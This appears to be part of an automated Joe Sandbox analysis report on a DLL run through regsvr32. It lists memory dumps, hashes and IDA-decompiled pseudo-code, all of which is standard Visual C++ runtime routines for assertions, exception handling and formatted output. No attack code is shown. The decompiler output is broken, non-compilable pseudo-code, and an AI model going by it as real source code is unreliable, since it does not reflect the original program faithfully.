                                                      • String ID: %s(%d) : %s$(*_errno())$, Line $<file unknown>$Assertion failed!$Assertion failed: $Second Chance Assertion Failed: File $_CrtDbgReport: String too long or IO Error$_CrtDbgReport: String too long or Invalid characters in String$_VCrtDbgReportA$_itoa_s(nLine, szLineMessage, 4096, 10)$e = mbstowcs_s(&ret, szOutMessage2, 4096, szOutMessage, ((size_t)-1))$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrptt.c$strcat_s(szLineMessage, 4096, "\n")$strcat_s(szLineMessage, 4096, "\r")$strcat_s(szLineMessage, 4096, szUserMessage)$strcpy_s(szLineMessage, 4096, szFormat ? "Assertion failed: " : "Assertion failed!")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$strcpy_s(szUserMessage, 4096, "_CrtDbgReport: String too long or IO Error")$wcscpy_s(szOutMessage2, 4096, L"_CrtDbgReport: String too long or Invalid characters in String")$6o$Pl
                                                      • API String ID: 242677333-579931786
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$FileModuleName
                                                      • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowW$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$wcscpy_s(szExeName, 260, L"<program name unknown>")$wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
                                                      • API String ID: 1949418964-1840610800
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: _invoke_watson_if_error$_invalid_parameter
                                                      • String ID: For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts.$File: $Line: $Module: $(*_errno())$...$<program name unknown>$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Expression: $Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)$strcpy_s(szExeName, 260, "<program name unknown>")$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")$m*
                                                      • API String ID: 2356156361-2279852085
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: FileHandleWrite
                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $_NMSG_WRITE$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\crt0msg.c$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"\n\n")$wcscat_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), error_text)$wcscpy_s(outmsg, (sizeof(outmsg) / sizeof(outmsg[0])), L"Runtime Error!\n\nProgram: ")$wcscpy_s(progname, progname_size, L"<program name unknown>")$wcsncpy_s(pch, progname_size - (pch - progname), L"...", 3)$_$0I$2H
                                                      • API String ID: 3320372497-2837547082
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: AddressLibraryLoadProc
                                                      • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationW$MessageBoxW$USER32.DLL
                                                      • API String ID: 2574300362-564504941
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWidewcsncnt
                                                      • String ID:
                                                      • API String ID: 641786319-0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 20%
                                                      			E000007FE7FEF9D340B0(void* __ecx, void* __edi, void* __esi, void* __esp, void* __eflags, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, void* _a8, void* _a16, long long _a24, void* _a32, signed int* _a40, signed int _a48, signed int _a56, long long _a64) {
                                                      				long long _v24;
                                                      				long long _v32;
                                                      				char _v56;
                                                      				long long _v64;
                                                      				long long _v72;
                                                      				char _v80;
                                                      				void* _v88;
                                                      				void* _v96;
                                                      				intOrPtr _v104;
                                                      				void* _v112;
                                                      				intOrPtr _v120;
                                                      				void* _v128;
                                                      				char _v132;
                                                      				char _v136;
                                                      				long long _v144;
                                                      				signed int _v152;
                                                      				char _v160;
                                                      				signed char _v164;
                                                      				signed int _v168;
                                                      				char _v176;
                                                      				char _v184;
                                                      				long long _v192;
                                                      				signed char _v200;
                                                      				long long _v208;
                                                      				signed int _v216;
                                                      				signed int _v224;
                                                      				long long _v232;
                                                      				void* _t222;
                                                      				void* _t244;
                                                      				void* _t295;
                                                      				long long _t302;
                                                      				long long _t303;
                                                      				intOrPtr _t311;
                                                      				long long _t312;
                                                      				long long _t321;
                                                      				intOrPtr _t325;
                                                      				long long _t329;
                                                      				long long _t330;
                                                      				long long _t332;
                                                      
                                                      				_t295 = __rax;
                                                      				_a32 = __r9;
                                                      				_a24 = __r8;
                                                      				_a16 = __rdx;
                                                      				_a8 = __rcx;
                                                      				_v164 = 0;
                                                      				_v152 = 0;
                                                      				_v168 = E000007FE7FEF9D33B40(_a40, _a32);
                                                      				E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v160);
                                                      				if (_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40) <= 0) goto 0xf9d34176;
                                                      				r9d = _v168;
                                                      				E000007FE7FEF9D33BD0(_t217,  &_v160, _a32, _a40);
                                                      				r9d = _v168;
                                                      				E000007FE7FEF9D33C00(_v168 - E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40), _t295, _a16, _a32, _a40);
                                                      				goto 0xf9d34197;
                                                      				_v168 = E000007FE7FEF9D33C70(_t295, _a16, _a32, _a40);
                                                      				if (_v168 - 0xffffffff < 0) goto 0xf9d341b1;
                                                      				if (_v168 - _a40[1] >= 0) goto 0xf9d341b1;
                                                      				goto 0xf9d341b6;
                                                      				_t222 = E000007FE7FEF9D2CF80(_a40);
                                                      				if ( *_a8 != 0xe06d7363) goto 0xf9d34398;
                                                      				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d34398;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d34213;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d34213;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d34398;
                                                      				_t302 = _a8;
                                                      				if ( *((long long*)(_t302 + 0x30)) != 0) goto 0xf9d34398;
                                                      				0xf9d24000();
                                                      				if ( *((long long*)(_t302 + 0xf0)) != 0) goto 0xf9d3423a;
                                                      				goto 0xf9d34862;
                                                      				0xf9d24000();
                                                      				_t303 =  *((intOrPtr*)(_t302 + 0xf0));
                                                      				_a8 = _t303;
                                                      				0xf9d24000();
                                                      				_a24 =  *((intOrPtr*)(_t303 + 0xf8));
                                                      				_v164 = 1;
                                                      				E000007FE7FEF9D2E6E0(_t222, _a8,  *((intOrPtr*)(_a8 + 0x38)));
                                                      				if (E000007FE7FEF9D3D2C0(1, _a8) == 0) goto 0xf9d34290;
                                                      				goto 0xf9d34295;
                                                      				E000007FE7FEF9D2CF80(_a8);
                                                      				if ( *_a8 != 0xe06d7363) goto 0xf9d342fa;
                                                      				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d342fa;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d342e6;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d342e6;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d342fa;
                                                      				_t311 = _a8;
                                                      				if ( *((long long*)(_t311 + 0x30)) != 0) goto 0xf9d342fa;
                                                      				E000007FE7FEF9D2CF80(_t311);
                                                      				0xf9d24000();
                                                      				if ( *((long long*)(_t311 + 0x108)) == 0) goto 0xf9d34398;
                                                      				0xf9d24000();
                                                      				_t312 =  *((intOrPtr*)(_t311 + 0x108));
                                                      				_v144 = _t312;
                                                      				0xf9d24000();
                                                      				 *((long long*)(_t312 + 0x108)) = 0;
                                                      				if ((E000007FE7FEF9D35BB0(_t312, _a8, _v144) & 0x000000ff) == 0) goto 0xf9d34349;
                                                      				goto 0xf9d34398;
                                                      				if ((E000007FE7FEF9D35CC0(_v144) & 0x000000ff) == 0) goto 0xf9d34393;
                                                      				E000007FE7FEF9D35AB0(1, _a8);
                                                      				E000007FE7FEF9D34870( &_v56, "bad exception");
                                                      				E000007FE7FEF9D3D320(__edi, __esi, __esp,  &_v56, 0xf9d4a180);
                                                      				goto 0xf9d34398;
                                                      				E000007FE7FEF9D2CF50(_t312);
                                                      				if ( *_a8 != 0xe06d7363) goto 0xf9d347d9;
                                                      				if ( *((intOrPtr*)(_a8 + 0x18)) != 4) goto 0xf9d347d9;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930520) goto 0xf9d343f5;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) == 0x19930521) goto 0xf9d343f5;
                                                      				if ( *((intOrPtr*)(_a8 + 0x20)) != 0x19930522) goto 0xf9d347d9;
                                                      				if (_a40[3] <= 0) goto 0xf9d3466c;
                                                      				_v216 = _a32;
                                                      				_v224 =  &_v132;
                                                      				_t321 =  &_v136;
                                                      				_v232 = _t321;
                                                      				r9d = _v168;
                                                      				r8d = _a56;
                                                      				E000007FE7FEF9D2EA30(_a16, _a40);
                                                      				_v128 = _t321;
                                                      				goto 0xf9d3447e;
                                                      				_v136 = _v136 + 1;
                                                      				_v128 = _v128 + 0x14;
                                                      				if (_v136 - _v132 >= 0) goto 0xf9d3466c;
                                                      				if ( *_v128 - _v168 > 0) goto 0xf9d344b3;
                                                      				_t325 = _v128;
                                                      				if (_v168 -  *((intOrPtr*)(_t325 + 4)) <= 0) goto 0xf9d344b5;
                                                      				goto 0xf9d3445a;
                                                      				E000007FE7FEF9D2E680( *((intOrPtr*)(_t325 + 4)), _t325);
                                                      				_v112 = _t325 +  *((intOrPtr*)(_v128 + 0x10));
                                                      				_v120 =  *((intOrPtr*)(_v128 + 0xc));
                                                      				_v120 = _v120 - 1;
                                                      				_t329 = _v112 + 0x14;
                                                      				_v112 = _t329;
                                                      				if (_v120 <= 0) goto 0xf9d34667;
                                                      				_t244 = E000007FE7FEF9D2E6A0(_v120 - 1, _t329);
                                                      				_t330 = _t329 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc)) + 4;
                                                      				_v96 = _t330;
                                                      				E000007FE7FEF9D2E6A0(_t244, _t330);
                                                      				_v104 =  *((intOrPtr*)(_t330 +  *((intOrPtr*)( *((intOrPtr*)(_a8 + 0x30)) + 0xc))));
                                                      				goto 0xf9d3457e;
                                                      				_v104 = _v104 - 1;
                                                      				_t332 = _v96 + 4;
                                                      				_v96 = _t332;
                                                      				if (_v104 <= 0) goto 0xf9d34662;
                                                      				E000007FE7FEF9D2E6A0(_v104 - 1, _t332);
                                                      				_v88 = _t332 +  *_v96;
                                                      				if (E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))) != 0) goto 0xf9d345ce;
                                                      				goto 0xf9d3455a;
                                                      				_v152 = 1;
                                                      				_v176 = _a48 & 0x000000ff;
                                                      				_v184 = _v164 & 0x000000ff;
                                                      				_v192 = _a64;
                                                      				_v200 = _a56;
                                                      				_v208 = _v128;
                                                      				_v216 = _v88;
                                                      				_v224 = _v112;
                                                      				_v232 = _a40;
                                                      				E000007FE7FEF9D35180(__edi, __esi, __esp, E000007FE7FEF9D34CD0(_v112, _v88,  *((intOrPtr*)(_a8 + 0x30))), _a8, _a16, _a24, _a32);
                                                      				goto 0xf9d34667;
                                                      				goto 0xf9d3455a;
                                                      				goto L1;
                                                      				goto 0xf9d3445a;
                                                      				__eax = _v152 & 0x000000ff;
                                                      				__eflags = _v152 & 0x000000ff;
                                                      				if ((_v152 & 0x000000ff) != 0) goto 0xf9d347d7;
                                                      				__rax = _a40;
                                                      				__eax =  *_a40;
                                                      				__eax =  *_a40 & 0x1fffffff;
                                                      				__eflags = __eax - 0x19930521;
                                                      				if (__eax - 0x19930521 < 0) goto 0xf9d347d7;
                                                      				__rax = _a40;
                                                      				__eflags =  *(__rax + 0x20);
                                                      				if ( *(__rax + 0x20) == 0) goto 0xf9d346bf;
                                                      				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                      				_a40 = _a40[8];
                                                      				_v32 = __rax;
                                                      				goto 0xf9d346cb;
                                                      				_v32 = 0;
                                                      				__eflags = _v32;
                                                      				if (_v32 == 0) goto 0xf9d347d7;
                                                      				__rax = _a40;
                                                      				__eflags =  *(__rax + 0x20);
                                                      				if ( *(__rax + 0x20) == 0) goto 0xf9d34706;
                                                      				__eax = E000007FE7FEF9D2E680(__eax, __rax);
                                                      				_a40 = _a40[8];
                                                      				__rax = __rax + _a40[8];
                                                      				_v24 = __rax;
                                                      				goto 0xf9d34712;
                                                      				_v24 = 0;
                                                      				__rdx = _v24;
                                                      				__rcx = _a8;
                                                      				E000007FE7FEF9D35BB0(__rax, _a8, _v24) = __al & 0x000000ff;
                                                      				__eflags = __al & 0x000000ff;
                                                      				if ((__al & 0x000000ff) != 0) goto 0xf9d347d7;
                                                      				__rax = _a16;
                                                      				_v64 = _a16;
                                                      				__r9 =  &_v80;
                                                      				__r8 = _a40;
                                                      				__rdx = _a32;
                                                      				__rcx = _a16;
                                                      				__eax = E000007FE7FEF9D2E500(_a16, _a32, _a40,  &_v80);
                                                      				_v64 = __rax;
                                                      				_v72 = 0;
                                                      				__eax = _a48 & 0x000000ff;
                                                      				_v200 = __al;
                                                      				__rax = _a32;
                                                      				_v208 = _a32;
                                                      				__rax = _a40;
                                                      				_v216 = _a40;
                                                      				_v224 = 0xffffffff;
                                                      				_v232 = 0;
                                                      				__r9 = _v64;
                                                      				__r8 = _a24;
                                                      				__rdx = _a8;
                                                      				__rcx = _a16;
                                                      				__eax = E000007FE7FEF9D2EDC0(__edi, __esi, __esp, _a16, _a8, _a24, _v64);
                                                      				goto 0xf9d3484c;
                                                      				__rax = _a40;
                                                      				__eflags =  *(__rax + 0xc);
                                                      				if ( *(__rax + 0xc) <= 0) goto 0xf9d3484c;
                                                      				__eax = _a48 & 0x000000ff;
                                                      				__eflags = _a48 & 0x000000ff;
                                                      				if ((_a48 & 0x000000ff) != 0) goto 0xf9d34847;
                                                      				__rax = _a64;
                                                      				_v208 = _a64;
                                                      				__eax = _a56;
                                                      				_v216 = _a56;
                                                      				__eax = _v168;
                                                      				_v224 = _v168;
                                                      				__rax = _a40;
                                                      				_v232 = _a40;
                                                      				__r9 = _a32;
                                                      				__r8 = _a24;
                                                      				__rdx = _a16;
                                                      				__rcx = _a8;
                                                      				__eax = E000007FE7FEF9D34960(__ecx, _a8, _a16, _a24, _a32);
                                                      				goto 0xf9d3484c;
                                                      				__eax = E000007FE7FEF9D2CF50(__rax);
                                                      				0xf9d24000();
                                                      				__eflags =  *((long long*)(__rax + 0x108));
                                                      				if ( *((long long*)(__rax + 0x108)) != 0) goto 0xf9d3485d;
                                                      				goto 0xf9d34862;
                                                      				return E000007FE7FEF9D2CF80(__rax);
                                                      			}










































                                                      0x7fef9d3484c
                                                      0x7fef9d34851
                                                      0x7fef9d34859
                                                      0x7fef9d3485b
                                                      0x7fef9d34869

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: BlockStateUnwind_inconsistency$ControlFromterminate$BaseDecodeEntryExceptionFunctionImageLookupPointerRaiseReadThrowValidatestd::bad_exception::bad_exceptionstd::exception::exceptiontype_info::operator==
                                                      • String ID: bad exception$csm$csm$csm
                                                      • API String ID: 3498492519-820278400
                                                      • Opcode ID: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                      • Instruction ID: b93d13205fcb5bf4744c4f5868d42f2397ba004b3dd065f5f3bbc86f0087c528
                                                      • Opcode Fuzzy Hash: e25f8e0578bfe9456fb08d8cd94b15df4ac81620a0b1491193f50dcc2ec7c96e
                                                      • Instruction Fuzzy Hash: C412D436A0DBC585DAB19B15E8407EEB7A0F7C8791F604126DACD87BA9CB7DD440CB40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$_invalid_parameter$UpdateUpdate::~_
                                                      • String ID: ( (_Stream->_flag & _IOSTRG) || ( fn = _fileno(_Stream), ( (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))$("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 4023976971-2293733425
                                                      • Opcode ID: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                      • Instruction ID: fa666a0989dbdcd631dba14fdf712f3fd1171dc1b338b0fed7bc0ada6eb2a45d
                                                      • Opcode Fuzzy Hash: 418e75de3b5502e14211c5140618c90997ad4f56b588356074338880c32fc633
                                                      • Instruction Fuzzy Hash: 8B024A72A0D7C28AE7B09B24E8447BEB7E4F384345F604126D6CC46AA9DB7EE545CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~__invalid_parameter
                                                      • String ID: _mbstowcs_l_helper$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbstowcs.c$s != NULL
                                                      • API String ID: 530996419-3695252689
                                                      • Opcode ID: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                      • Instruction ID: dd73616ddae2cae72d7b30165dff30affe8ff5e8ed842a8499c58fb9266416ee
                                                      • Opcode Fuzzy Hash: 1f2dbb67bc1f08ab970a747115c78d639e8f09549dde5f83a97e8aad344e67fd
                                                      • Instruction Fuzzy Hash: FAD11832A1CBC585E7A09B15E8407AEB7A0F784794F605626E6DE83BE9DF3DD444CB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: "$"$("Buffer too small", 0)$_wctomb_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\wctomb.c$sizeInBytes <= INT_MAX$sizeInBytes > 0
                                                      • API String ID: 2192614184-1854130327
                                                      • Opcode ID: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                      • Instruction ID: 7076a95ac8019ae0c7cbf4bc144243c7f76c7d2257b38824bc8c592ccc79079f
                                                      • Opcode Fuzzy Hash: aa152b01a59852e776b44a3c5c58d1ae4cb5e6b33e85f9a53a8f9bb433ba7f1c
                                                      • Instruction Fuzzy Hash: 33C10932A0D68286E7B09B54E8547BEB7E0F784744F604126E6CD87AE9CB7EE444CF41
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.938324164.000007FEF9D21000.00000020.00000001.01000000.00000005.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                                      • Associated: 00000003.00000002.938319217.000007FEF9D20000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938350415.000007FEF9D42000.00000002.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938359362.000007FEF9D4B000.00000004.00000001.01000000.00000005.sdmp
                                                      • Associated: 00000003.00000002.938381033.000007FEF9D4F000.00000002.00000001.01000000.00000005.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                                      Similarity
                                                      • API ID: Locale$UpdateUpdate::~_$_invalid_parameter
                                                      • String ID: ("Incorrect format specifier", 0)$((state == ST_NORMAL) || (state == ST_TYPE))$(format != NULL)$(stream != NULL)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                                      • API String ID: 2192614184-1870338870
                                                      • Opcode ID: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                      • Instruction ID: de6734cae50e00c17b19ae97f10413d83fe6e5a887ca475c0331002d176214a7
                                                      • Opcode Fuzzy Hash: 6ca64bf4fa78d85cba0345094e3509d1db8362709fbf7feea33e231a459a9eed
                                                      • Instruction Fuzzy Hash: 66D10972A0DA828AE7B09F64E8447AFB6E0F384349F604125D6CD47AE8DB7ED545CF40
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 19%
                                                      			E000007FE7FEF9D3C6D6(signed int __rax, void* __rdx, long long _a32, void* _a64, void* _a72, intOrPtr _a76, signed int _a80, char _a84, char _a85, intOrPtr _a88, long long _a92, long long _a96, signed char _a104, intOrPtr _a108, signed int _a116, char _a120, char _a687, char _a688, intOrPtr _a704, intOrPtr _a708, signed char _a816, signed int _a824, signed int _a832, intOrPtr _a840, signed short* _a848, signed char _a856, char _a860, char _a864, long long _a872, intOrPtr _a876, intOrPtr _a912, intOrPtr _a916, signed int _a1040, long long _a1048, signed short _a1056, long long _a1060, signed int _a1064, intOrPtr _a1088, char _a1112) {
                                                      				signed int _t223;
                                                      				signed char _t228;
                                                      				intOrPtr _t263;
                                                      				signed int _t338;
                                                      				signed int _t339;
                                                      				signed long long _t342;
                                                      				intOrPtr* _t365;
                                                      				signed long long _t390;
                                                      
                                                      				_t338 = __rax;
                                                      				_a80 = _a80 | 0x00000040;
                                                      				_a72 = 0xa;
                                                      				_a72 = 0xa;
                                                      				_a116 = 0x10;
                                                      				asm("bts eax, 0xf");
                                                      				_a708 = 7;
                                                      				_a708 = 0x27;
                                                      				_a72 = 0x10;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c754;
                                                      				_a84 = 0x30;
                                                      				_a85 = _a708 + 0x51;
                                                      				_a92 = 2;
                                                      				_a72 = 8;
                                                      				if ((_a80 & 0x00000080) == 0) goto 0xf9d3c777;
                                                      				asm("bts eax, 0x9");
                                                      				if ((_a80 & 0x00008000) == 0) goto 0xf9d3c79e;
                                                      				E000007FE7FEF9D31EA0( &_a1112);
                                                      				_a824 = _t338;
                                                      				goto 0xf9d3c84b;
                                                      				if ((_a80 & 0x00001000) == 0) goto 0xf9d3c7c5;
                                                      				E000007FE7FEF9D31EA0( &_a1112);
                                                      				_a824 = _t338;
                                                      				goto 0xf9d3c84b;
